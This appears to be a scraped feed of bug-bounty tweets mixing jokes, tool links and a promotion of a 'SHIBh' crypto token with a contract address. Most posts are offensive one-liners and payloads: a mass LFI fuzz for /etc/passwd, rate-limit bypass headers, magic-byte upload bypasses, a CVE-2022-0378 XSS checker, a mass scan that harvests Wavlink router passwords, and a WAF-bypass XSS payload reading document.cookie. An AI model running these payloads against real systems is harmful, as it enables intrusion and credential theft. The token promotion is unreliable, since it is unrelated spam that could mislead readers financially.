Hacker problems 😴 zzz 　＜⌒／ヽ-､_＿_ ／＜_/＿＿＿＿／ ￣￣￣￣￣￣￣ 　　　∧_∧ Are my scans 　　 (･ω･) still running? 　 ＿|⊃／(＿＿_ ／　└-(＿＿＿_／

How to get a dream job at your dream company: Start a company. Employ yourself.

Hackerone Reports categorized: github.com/bminossi/AllVi…

About SHIBh: Plz keep these in mind. 1 Total supply: 50,000,000,000 2 One and only use of SHIBh: 1SHIB+1SHIBh=0.000001 BUSD 3 Remember to hedge trading risk and that is what Helmet.insure works for 4 SHIBh sc: 0x224b33139a377a62d4bad3d58cedb7807ae228eb

LFI FINDING cat target.txt | while read url;do ffuf -w payload-lfi.txt -u "$url" -mr root:[x*]:0:0: -or data.txt -v;done target.txt : - lol123.com/?file=FUZZ lfi is in data.txt #bugbounty #oneliner

(1/2) Some Rate Limit Bypass Headers : X-Originating-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Forwarded-Host : 127.0.0.1 #Hackenews #bugbonty #bugbountytips #infosec #cybersecurity #bugbountytip #Linux

git clone github.com/scipag/vulscan scipag_vulscan ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan nmap -sV --script=vulscan/vulscan.nse example.com

Here's a flow that works for bug bounty success: - Pick a popular & complex technology/process - Learn EVERYTHING about it, implement it yourself - Find ways that it can be misconfigured or implemented poorly - Get a list of targets utilising it - Test them en masse - Repeat 🔁

Sensitive Data leakage using .json #Hackenews #bugbounty #cybersecurity #bugbountytips #bugbountytip

Collection of some interesting Google dorks ==================== github.com/CorrieOnly/goo… ==================== #bugbountytips #bugbounty #googledorks #google #apache #sql #exploitdb #joomla #magento #sensitive #dorks

Enumeration Cheat Sheet for OSCP #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #infosec #itsecurity #websecurity #networksecurity

Scan Ports and Vulnerabilities CVE using nrich - gitlab.com/shodan-public/… - github.com/projectdiscove… #bugbountytips

Magic Bytes upload bypass GIFGIF89a;\x0a PDF%PDF- JPG / JPEG\xFF\xD8\xFF\xDB PNG\x89\x50\x4E\x47\x0D\x0A\x1A\x0A TAR\x75\x73\x74\x61\x72\x00\x30\x30 XML<?xml

CVE-2022-0378 POC 🔥👇 ✅ One Liner : cat file.txt | while read h do;do curl -sk --insecure "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && \echo "$h \033[0;31mVul\n" || echo "$h \033[0;32mNot\n";done

Top 10 essential tools for Bug-Bounty Hunting : 1. Burp Suite / ZAP-Proxy 2. Google Dorking Script 3. DNS-Discovery 4. Reverse IP Lookup 5. Wapiti 6. INalyzer 7. IronWASP 8. Wfuzz 9. HackBar 10. Nucleii (😜😜) #Security #cybersecuritytips #bugbountytips #BugBounty #bugbountytool

how I found XSS AND SQL INJECTION 1 I found text.php 2 I used Arjun to find parameters 3 text.Php?m=1'xss and SQL done, I submitted to h1 #bugbounty #hackerone #bugbountytips

Wavlink WN530HG4 Password Disclosure 🔥🔥🔥 cat rootDomains.txt | assetfinder -subs-only | httpx -path "/set_safety.shtml?r=52300" -silent -nc -p 443,80,8443,8080,9000,9001,9002,9003,8888 -t 80 -mr "var syspasswd=" #bugbountytips #bugbountytip #bugbounty

(XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> #bugbountytips #bugbounty

bypassed the registration validation and logged-in with the company email by khaledyasse1882 link.medium.com/aORAUUywsxb